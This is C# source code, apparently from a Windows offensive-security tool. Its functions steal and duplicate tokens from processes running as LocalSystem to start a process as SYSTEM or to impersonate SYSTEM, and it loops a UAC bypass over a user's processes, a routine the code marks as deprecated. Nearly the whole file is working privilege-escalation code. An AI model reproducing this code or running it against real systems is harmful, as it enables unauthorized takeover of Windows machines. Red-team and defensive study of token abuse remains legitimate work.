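////////////////////////////////////////////////////////////////////////////////
// Creates a new process as SYSTEM
//
// Walks every process running as the LocalSystem account, opens each one's
// token, duplicates it at SecurityImpersonation level and tries to launch
// newProcess under the copy. The first token that works wins.
//
// newProcess - command line handed to StartProcessAsUser
// returns    - true once a process has been started; false when no candidate
//              was found or every candidate token failed (the last Win32
//              error is reported either way)
//
// NOTE(review): opening another SYSTEM process's token presumably needs an
// elevated caller (SeDebugPrivilege or equivalent) — confirm in OpenProcessToken.
////////////////////////////////////////////////////////////////////////////////
public bool GetSystem(string newProcess)
{
    SecurityIdentifier systemSid = new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null);
    NTAccount systemAccount = (NTAccount)systemSid.Translate(typeof(NTAccount));
    string systemName = systemAccount.ToString();
    Console.WriteLine("[*] Searching for {0}", systemName);

    // 'processes' is a field shared with the other token helpers, so keep populating it
    processes = UserSessions.EnumerateUserProcesses(false, systemName);
    if (processes == null || processes.Count == 0)
    {
        // Without a candidate the loop below would never run; say so explicitly
        // instead of letting the caller read a stale Win32 error as the cause
        Console.WriteLine("[-] No processes found for {0}", systemName);
        Misc.GetWin32Error("GetSystem");
        return(false);
    }

    foreach (uint pid in processes.Keys)
    {
        if (!OpenProcessToken((int)pid))
        {
            // Could not open this one; try the next SYSTEM process
            continue;
        }
        Console.WriteLine(" [+] Opened {0}", pid);
        SetWorkingTokenToRemote();

        // Duplicate the borrowed token, then launch under the copy
        if (!DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
        {
            continue;
        }
        SetWorkingTokenToNewToken();
        if (StartProcessAsUser(newProcess))
        {
            return(true);
        }
    }

    // Every candidate failed; surface the last Win32 error for the operator
    Misc.GetWin32Error("GetSystem");
    return(false);
}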
////////////////////////////////////////////////////////////////////////////////
// Use Native APIs to find processes that a user is running
//
// Reads the "username" argument from the parsed command line, asks
// UserSessions for that user's processes and prints them as a two-column
// PID / name table. Prints an error and returns when no username was given.
//
// cLP - parsed command line; must carry a "username" value
////////////////////////////////////////////////////////////////////////////////
private static void _FindUserProcesses(CommandLineParsing cLP)
{
    string targetUser;
    bool haveUser = cLP.GetData("username", out targetUser);
    if (!haveUser)
    {
        Console.WriteLine("[-] Username not specified");
        return;
    }

    Dictionary<uint, string> userProcesses = UserSessions.EnumerateUserProcesses(false, targetUser);

    // Same column layout for header, separator and every row
    const string rowFormat = "{0,-30}{1,-30}";
    Console.WriteLine(rowFormat, "Process ID", "Process Name");
    Console.WriteLine(rowFormat, "----------", "------------");
    foreach (KeyValuePair<uint, string> entry in userProcesses)
    {
        Console.WriteLine(rowFormat, entry.Key, entry.Value);
    }
}
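////////////////////////////////////////////////////////////////////////////////
// Elevates current process to SYSTEM
//
// Walks every process running as the LocalSystem account, opens each one's
// token, makes it the working token and tries to impersonate it. The first
// token that works wins.
//
// returns - true once impersonation succeeded; false when no candidate was
//           found or every candidate token failed
//
// NOTE(review): if ImpersonateUser wraps ImpersonateLoggedOnUser, only the
// calling thread gets the SYSTEM context, not the whole process — confirm.
// NOTE(review): opening another SYSTEM process's token presumably needs an
// elevated caller (SeDebugPrivilege or equivalent) — confirm in OpenProcessToken.
////////////////////////////////////////////////////////////////////////////////
public bool GetSystem()
{
    SecurityIdentifier systemSid = new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null);
    NTAccount systemAccount = (NTAccount)systemSid.Translate(typeof(NTAccount));
    string systemName = systemAccount.ToString();
    Console.WriteLine("[*] Searching for {0}", systemName);

    // 'processes' is a field shared with the other token helpers, so keep populating it
    processes = UserSessions.EnumerateUserProcesses(false, systemName);
    if (processes == null || processes.Count == 0)
    {
        // Without a candidate the loop below would never run; make the
        // reason for the false return visible to the operator
        Console.WriteLine("[-] No processes found for {0}", systemName);
        return(false);
    }

    foreach (uint pid in processes.Keys)
    {
        if (!OpenProcessToken((int)pid))
        {
            // Could not open this one; try the next SYSTEM process
            continue;
        }
        Console.WriteLine(" [+] Opened {0}", pid);
        SetWorkingTokenToRemote();
        if (ImpersonateUser())
        {
            return(true);
        }
    }

    // Every candidate failed; previously this returned false silently
    Console.WriteLine("[-] Unable to impersonate {0} from any process", systemName);
    return(false);
}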
////////////////////////////////////////////////////////////////////////////////
// UAC Token Magic - Deprecated
//
// Always prints the deprecation notice first. With a remote target it runs
// the bypass once against cLP.ProcessID; otherwise it enumerates the current
// user's processes and tries the bypass against each PID in turn, with a
// fresh RestrictedToken wrapper around hToken for every attempt.
//
// cLP    - parsed command line (Remote, ProcessID, Command)
// hToken - token handle the RestrictedToken wrappers are built on
//
// NOTE(review): the notice below says this stops working on Windows 10 builds
// after 1703; callers should not expect success on current builds.
////////////////////////////////////////////////////////////////////////////////
private static void _BypassUAC(CommandLineParsing cLP, IntPtr hToken)
{
    Console.WriteLine("[*] Notice: This no longer working on versions of Windows 10 > 1703");

    if (cLP.Remote)
    {
        // Single explicit target, no enumeration needed
        using (RestrictedToken remoteToken = new RestrictedToken(hToken))
        {
            remoteToken.BypassUAC(cLP.ProcessID, cLP.Command);
        }
        return;
    }

    string currentUser = WindowsIdentity.GetCurrent().Name;
    Dictionary<uint, string> candidates = UserSessions.EnumerateUserProcesses(true, currentUser);
    foreach (KeyValuePair<uint, string> candidate in candidates)
    {
        Console.WriteLine("\n[*] Attempting Bypass with PID {0} ({1})", candidate.Key, candidate.Value);
        // One wrapper per attempt so each is disposed before the next PID
        using (RestrictedToken attemptToken = new RestrictedToken(hToken))
        {
            attemptToken.BypassUAC((int)candidate.Key, cLP.Command);
        }
    }
}